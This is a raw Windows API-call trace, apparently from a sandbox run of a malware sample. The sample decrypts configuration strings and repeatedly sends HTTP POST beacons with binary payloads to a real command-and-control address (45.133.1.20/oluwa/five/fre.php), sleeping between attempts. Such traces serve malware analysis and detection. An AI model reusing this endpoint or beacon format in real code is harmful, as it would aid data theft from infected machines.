LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.411] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.412] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.412] GetProcessHeap () returned 0x6a0000 [0320.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0320.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.415] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0320.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.416] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0320.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.417] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0320.417] GetProcessHeap () returned 0x6a0000 [0320.417] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.419] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.421] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.422] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.424] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.424] GetProcessHeap () returned 0x6a0000 [0320.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0320.424] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.424] GetProcessHeap () returned 0x6a0000 [0320.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0320.425] GetProcessHeap () returned 0x6a0000 [0320.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.426] GetProcessHeap () returned 0x6a0000 [0320.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0320.426] GetProcessHeap () returned 0x6a0000 [0320.426] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0320.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.427] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.436] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0320.446] GetProcessHeap () returned 0x6a0000 [0320.446] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0320.447] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.447] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0320.448] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.449] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.452] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.452] GetProcessHeap () returned 0x6a0000 [0320.453] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0320.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.454] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0320.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.455] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0320.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.457] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0320.457] GetProcessHeap () returned 0x6a0000 [0320.457] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.458] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0320.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.459] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0320.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.461] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0320.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.462] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0320.462] GetProcessHeap () returned 0x6a0000 [0320.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0320.462] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0320.462] GetProcessHeap () returned 0x6a0000 [0320.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0320.462] socket (af=2, type=1, protocol=6) returned 0xc68 [0320.501] connect (s=0xc68, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0320.526] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0320.526] GetProcessHeap () returned 0x6a0000 [0320.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0320.526] GetProcessHeap () returned 0x6a0000 [0320.526] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0320.527] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.528] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.528] GetProcessHeap () returned 0x6a0000 [0320.528] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df7a8 [0320.528] GetProcessHeap () returned 0x6a0000 [0320.528] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.529] GetProcessHeap () returned 0x6a0000 [0320.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0320.529] GetProcessHeap () returned 0x6a0000 [0320.529] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0320.530] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.531] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.531] GetProcessHeap () returned 0x6a0000 [0320.531] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0320.531] GetProcessHeap () returned 0x6a0000 [0320.532] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.533] send (s=0xc68, buf=0x6bd460*, len=242, flags=0) returned 242 [0320.533] send (s=0xc68, buf=0x6bb998*, len=159, flags=0) returned 159 [0320.534] GetProcessHeap () returned 0x6a0000 [0320.534] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0320.534] recv (in: s=0xc68, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0320.610] GetProcessHeap () returned 0x6a0000 [0320.611] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0320.611] GetProcessHeap () returned 0x6a0000 [0320.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0320.612] GetProcessHeap () returned 0x6a0000 [0320.612] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df7a8 | out: hHeap=0x6a0000) returned 1 [0320.613] GetProcessHeap () returned 0x6a0000 [0320.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0320.613] closesocket (s=0xc68) returned 0 [0320.614] GetProcessHeap () returned 0x6a0000 [0320.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0320.614] GetProcessHeap () returned 0x6a0000 [0320.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.614] GetProcessHeap () returned 0x6a0000 [0320.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0320.615] GetProcessHeap () returned 0x6a0000 [0320.615] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0320.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19d0) returned 0xc68 [0320.618] Sleep (dwMilliseconds=0xea60) [0320.620] GetProcessHeap () returned 0x6a0000 [0320.620] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0320.621] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.621] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.661] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.662] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0320.677] GetProcessHeap () returned 0x6a0000 [0320.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b9f68 [0320.678] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.679] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b9f68, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0320.680] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.681] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.692] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.693] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.693] GetProcessHeap () returned 0x6a0000 [0320.694] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9f68 | out: hHeap=0x6a0000) returned 1 [0320.694] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.695] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0320.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.696] CryptDestroyKey (hKey=0x6ad020) returned 1 [0320.697] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.697] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0320.697] GetProcessHeap () returned 0x6a0000 [0320.697] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.699] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0320.699] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.700] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0320.701] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.702] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0320.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.703] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0320.703] GetProcessHeap () returned 0x6a0000 [0320.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0320.704] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0320.704] GetProcessHeap () returned 0x6a0000 [0320.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0320.704] GetProcessHeap () returned 0x6a0000 [0320.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.705] GetProcessHeap () returned 0x6a0000 [0320.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0320.705] GetProcessHeap () returned 0x6a0000 [0320.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0320.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.707] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.715] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0320.724] GetProcessHeap () returned 0x6a0000 [0320.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0320.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.725] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0320.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.727] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.727] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.728] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.728] GetProcessHeap () returned 0x6a0000 [0320.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0320.730] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.730] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0320.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.731] CryptDestroyKey (hKey=0x6ad020) returned 1 [0320.732] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.733] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0320.733] GetProcessHeap () returned 0x6a0000 [0320.733] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0320.734] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.734] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0320.735] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.735] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0320.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.737] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0320.738] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.738] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0320.738] GetProcessHeap () returned 0x6a0000 [0320.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0320.738] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0320.738] GetProcessHeap () returned 0x6a0000 [0320.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0320.739] socket (af=2, type=1, protocol=6) returned 0xc6c [0320.739] connect (s=0xc6c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0320.769] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0320.769] GetProcessHeap () returned 0x6a0000 [0320.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0320.769] GetProcessHeap () returned 0x6a0000 [0320.769] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0320.770] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.771] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0320.771] GetProcessHeap () returned 0x6a0000 [0320.771] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df928 [0320.771] GetProcessHeap () returned 0x6a0000 [0320.772] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.772] GetProcessHeap () returned 0x6a0000 [0320.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0320.772] GetProcessHeap () returned 0x6a0000 [0320.772] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0320.773] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.774] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0320.774] GetProcessHeap () returned 0x6a0000 [0320.774] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0320.774] GetProcessHeap () returned 0x6a0000 [0320.775] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0320.775] send (s=0xc6c, buf=0x6bd460*, len=242, flags=0) returned 242 [0320.776] send (s=0xc6c, buf=0x6bb998*, len=159, flags=0) returned 159 [0320.776] GetProcessHeap () returned 0x6a0000 [0320.776] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0320.776] recv (in: s=0xc6c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0320.847] GetProcessHeap () returned 0x6a0000 [0320.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0320.848] GetProcessHeap () returned 0x6a0000 [0320.848] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0320.849] GetProcessHeap () returned 0x6a0000 [0320.850] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df928 | out: hHeap=0x6a0000) returned 1 [0320.851] GetProcessHeap () returned 0x6a0000 [0320.851] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0320.851] closesocket (s=0xc6c) returned 0 [0320.853] GetProcessHeap () returned 0x6a0000 [0320.853] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0320.853] GetProcessHeap () returned 0x6a0000 [0320.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0320.855] GetProcessHeap () returned 0x6a0000 [0320.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0320.855] GetProcessHeap () returned 0x6a0000 [0320.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0320.856] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19d4) returned 0xc6c [0320.858] Sleep (dwMilliseconds=0xea60) [0320.859] GetProcessHeap () returned 0x6a0000 [0320.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0320.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.861] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.868] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0320.877] GetProcessHeap () returned 0x6a0000 [0320.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6638 [0320.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.880] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b6638, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0320.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.881] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.883] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.883] GetProcessHeap () returned 0x6a0000 [0320.883] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6638 | out: hHeap=0x6a0000) returned 1 [0320.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.888] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0320.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.889] CryptDestroyKey (hKey=0x6ad020) returned 1 